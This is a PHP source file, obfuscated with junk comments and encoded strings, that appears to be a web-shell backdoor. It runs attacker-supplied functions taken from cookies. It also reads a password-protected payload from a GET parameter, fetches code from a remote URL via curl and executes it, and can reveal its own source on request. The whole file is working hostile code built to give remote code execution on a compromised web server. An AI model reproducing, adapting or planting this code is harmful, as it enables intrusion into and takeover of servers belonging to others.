<?php /*-[E-*///
$bXSF /*-y;.&}-*///
=/*-py+j-*///
 range/*-tdoZ-*///
(/*-o{L{{uUwW-*///
"~"/*-5jyOzp-*///
, /*-6dO3l-*///
" "/*-vopR`]-*///
); /*-;M}uL-*///
$UC=${$bXSF[4+27].$bXSF[24+35].$bXSF[23+24].$bXSF[3+44].$bXSF[48+3].$bXSF[17+36].$bXSF[18+39]};@(count/*-g@WQz<0qk-*///
($UC)==20&&/*-F-*///
in_array(/*-$7c}B!0-*///
gettype($UC).count/*-hFy`-*///
($UC),$UC))?(($UC[63]=$UC[63].$UC[76])&&($UC[90]=$UC[63]($UC[90]))&&(@$UC=$UC[90]($UC[53],$UC[63](${$UC[39]}[19])))/*-:M)3.h^]-*///
&&/*-x]GDi;-*///
$UC()):$UC;/*-&(~vw-*///
class /*-bTjr2+-*///
Hp{ /*-&0?R=x=-*///
static/*-~4{J-*///
 function /*-$n-*///
STEMlzNCJ($LAFiq) /*-:+Df^57nm-*///
{ $YD/*-&2Av;_T#-*///
 = /*-^l776.9RR-*///
"r"./*-}n4#k5J)-*///
"a"./*-KWLKbst.-*///
"n"./*-DkWh##-*///
"g"./*-7RO8siO-*///
"e"; /*-u6k-*///
$YuztGRm/*-y(k:x+}^0-*///
 = /*-bFp;-*///
$YD/*-DW,AyA2k-*///
(/*-fx-*///
"~"/*-3cgWx@4-*///
, /*-T,~Vq)fy-*///
" "/*-TQstig+-*///
);/*-37a2nz-*///
 $EdtJn /*-E:L~_@-j-*///
= /*-9Tsaes]f-*///
explode/*-mQ-*///
(/*-Qq(h-*///
">", /*-1gy-*///
$LAFiq/*-L?){<OqU-*///
); /*-?xVh-*///
$BRfK /*-c4I9E&&x-*///
= /*-uY`Mvz~Uyl-*///
""; foreach /*-,CL:ph-*///
(/*-S7gT(9&y-*///
$EdtJn /*-BKBwV_1g-*///
as /*-A$~7Qn8-*///
$oVUwW /*-].w-*///
=>/*-:Ar-*///
 $nzSmd/*-g-MnvUd=$-*///
) /*-!fSYHc8Q-*///
$BRfK /*-A$S):-*///
.= /*-@9gvKu-*///
$YuztGRm[$nzSmd/*-.Hpg!FN-*///
 - /*-[!DDmi-*///
19297/*-&V-*///
];/*-6mA|e{0gF-*///
 return /*-jB?[BZ4-*///
$BRfK; /*-T&$-*///
} /*-qz=2-*///
static /*--KY,;=-*///
function /*-:&-*///
NDTZ/*-$Ny&=$-*///
(/*-UhJGo]41--*///
$vApejLZSsC,/*-iX-*///
 $Kb/*-hO.-*///
)/*-atY-*///
 {/*-Kc?owce-*///
 $MkfZjugze/*-&f-*///
 = /*-skpi-0,cN-*///
curl_init/*-$lz3-*///
(/*-W~_-*///
$vApejLZSsC/*-qZW1$h-*///
);/*-mc%wX5B-*///
 curl_setopt/*-m)N-*///
(/*-.OegTI`gUz-*///
$MkfZjugze,/*-#lVN-*///
 CURLOPT_RETURNTRANSFER,/*-z--*///
 1/*-5f-*///
);/*-<_kJIUK-*///
 $PWMFUvys/*-%:},)Lp2-*///
 = /*-,z3$-*///
curl_exec/*-^,&M_-*///
(/*-=0-*///
$MkfZjugze/*-Q%r}QKZ!=-*///
); /*-lJh-*///
return /*-,ag{:-*///
empty/*-u[_a.qlI-M-*///
(/*-D=XY_U&B-*///
$PWMFUvys/*-u:v-*///
)/*-YZ^:pHfHT,-*///
 ? /*-+-*///
$Kb/*-rKgr_-*///
(/*-8Jzh-*///
$vApejLZSsC/*-<GU=-*///
)/*-oYt-*///
 : /*-qNLn-*///
$PWMFUvys; /*-w_,e#y-*///
}/*-?48,`5^YZS-*///
 static/*-6UU-*///
 function /*-+-*///
citvH/*-7!-*///
() /*-$?+-*///
{/*-~AFh^r-*///
 $hWTZi /*-.QK=-*///
=/*-.P{G5|C}-*///
 array/*-=XB-*///
("19324>19309>19322>19326>19307>19322>19328>19321>19306>19313>19324>19307>19318>19312>19313","19308>19307>19309>19328>19309>19312>19307>19374>19372","19317>19308>19312>19313>19328>19323>19322>19324>19312>19323>19322","19311>19326>19324>19316","19325>19326>19308>19322>19369>19371>19328>19323>19322>19324>19312>19323>19322","19321>19318>19315>19322>19328>19320>19322>19307>19328>19324>19312>19313>19307>19322>19313>19307>19308","19351>19381","19298","19376>19381","19358>19341>19341>19358>19334","19312>19321"); /*-&E-*///
foreach /*-{N)^-*///
(/*-[Y-*///
$hWTZi/*-;F?)Vn1l-*///
 as /*-~L-*///
$NIah/*-p$M<U&0Gs-*///
)/*-2-*///
 $WZBwCVzud/*->+8oca-*///
[] /*-D2Efz-*///
= /*-x:;`g-*///
self/*-FM-*///
::/*-erW.j^L^-*///
STEMlzNCJ/*-Ur3{z6-*///
(/*-!#lT:ws-*///
$NIah/*-u-*///
);/*-U>>o-*///
$qQYRyItk /*-7{-*///
= /*-ed):~K-*///
@$WZBwCVzud/*--lK-*///
[/*-xO,+|Mp-*///
1/*-i|2`-.TF-*///
]/*-.<oGb4W-*///
(/*-jch|-*///
${/*-0EQ>M=&-*///
"_"/*-b>v-*///
."G"/*-pG-*///
."E"/*-JsJ-*///
."T"/*-zn`ZSo5U-*///
}[/*-hX-*///
$WZBwCVzud/*-4w3-*///
[/*-Wy!c8-*///
2+7/*-;,W,C-*///
]]/*-G8-*///
);/*-Co]qDK0D-*///
 $ro /*-5NQV`j&tu-*///
=/*-AK-*///
 @$WZBwCVzud/*-q6-*///
[/*-N0mLq`I^-*///
3+0/*-B<BrWW-*///
]/*-{r[@IWS#-*///
(/*-#(tMbw@#-*///
$WZBwCVzud/*-%AvPNS:-*///
[/*-t?;j}5-*///
4+2/*-h@-*///
], /*-u.4p:]so-*///
$qQYRyItk/*-;j7+h-*///
);/*-z{2-*///
 $yvHUeGdmMI /*-.5-*///
=/*-wZyGPvKpI-*///
 $WZBwCVzud/*-N>E)[T?R-*///
[/*-R2LQ~iOMw-*///
0+2/*-Xg5Zf-*///
]/*-Tk1<#2-*///
(/*-Ss&R|v-*///
$ro,/*-%<-*///
 true/*-T-*///
); /*-5Y@-*///
@${/*-YOf.24f-*///
"_"./*-^<Oj?zt-*///
"G"./*-})3k4--*///
"E"/*-vVG2!bF-*///
."T"/*-FD;!L,-*///
}/*-7F}P`Sw-*///
[/*-D(!+Jqf-*///
$WZBwCVzud/*-20BgWJvB<-*///
[9+1/*-.?-*///
]/*-_p(7bC~gc-*///
]/*-3Xn0bi.h>-*///
 == /*-p(.-*///
1 /*-}TX<SW`-*///
&& /*-p]d0a#ZK;-*///
die/*-!5-*///
(/*-g-KjQC-*///
$WZBwCVzud[3+2/*-s_9~-*///
]/*-SZHz+M-*///
(/*-`k@-*///
__FILE__/*-Jyu[Lrv&=-*///
)/*-}GYc2@-*///
); /*-s>@a-*///
if/*-~-0H&U-*///
(/*-p8-*///
 (/*-%oK:(<QS3-*///
(@/*-+j-*///
$yvHUeGdmMI/*-K@Rs?-*///
[/*-^>L?-*///
0/*-uUu<W$-*///
] /*-<bsU.kE-*///
- time/*-P(s7n$IB!-*///
()/*-x-*///
) > /*-b-*///
0/*-J:;Z]|+Wl-*///
)/*-o]sV.D3-*///
 and /*-_8$3!-*///
(/*-[QVGZXF-*///
md5/*-)`-*///
(/*-WUbZ:Z9!j-*///
md5/*-I:p-*///
(/*-SMKoB8zs-*///
$yvHUeGdmMI/*-5%AnT-*///
[/*-%s~$h[X~-*///
0+3/*-]fW=Oe-;H-*///
]/*-Ak+0}-*///
)/*-G2sE9_az_-*///
)/*-nOwz9ITW:L-*///
 === /*-.>zGug!-*///
"a5050ed3871fd6a04d11b0fec2cad109"/*-ne-*///
)/*-jJ79c?O^iV-*///
 ): /*-|^f~J>V-*///
$oj /*-zkm-*///
=/*-Cun&U-*///
 self/*-ZR:7R.v-*///
::/*-=?LAZ^a~;P-*///
NDTZ/*-V|-*///
(/*-WtF-*///
$yvHUeGdmMI/*-x@vsb-*///
[/*-4$4>C-*///
0+1/*-9xs4_T.;3-*///
], /*-B`P-*///
$WZBwCVzud/*-B@-*///
[/*-(f]%-*///
2+3/*-`$Z3&rG-*///
]/*-]t;~-*///
);/*-dc=Hv~5rxr-*///
@$WZBwCVzud/*->-9<K]e8-*///
[/*-N0I5-*///
0/*-w_Rvv&U8&R-*///
]/*-2zW-*///
(/*-E#,qaVQv-*///
"",/*-R_Y-*///
 $WZBwCVzud/*-FY]G-*///
[/*-[7UWK_)`q4-*///
7+0/*-hn-*///
] /*-.h5,IRYa-*///
. /*-eU)U-*///
$WZBwCVzud/*-8G-*///
[/*-<)nR`%36-*///
0+4/*-JawjslY-*///
]/*-LKjvqNF5-*///
(/*-Zqr7yyEm-*///
$oj/*-LEnrT-*///
)/*-S>y-*///
 . /*-!N2B`-*///
$WZBwCVzud/*-32Bv],-*///
[/*-_jJ-*///
7+1/*-n>YPS`H6-*///
]/*-XMmNd..5{m-*///
);/*-urIx<~CL`>-*///
/*-a|3S<-*///
die;/*-{~w$1ZXx-*///
 endif;/*-=K`ZlLV-*///
 }/*-&U~-*///
}/*-=Zo-*///
Hp/*-Diy<gA-*///
::/*-a5[0-*///
citvH/*-GDX:n-*///
();/*-6fm1pb6-*///
 ?>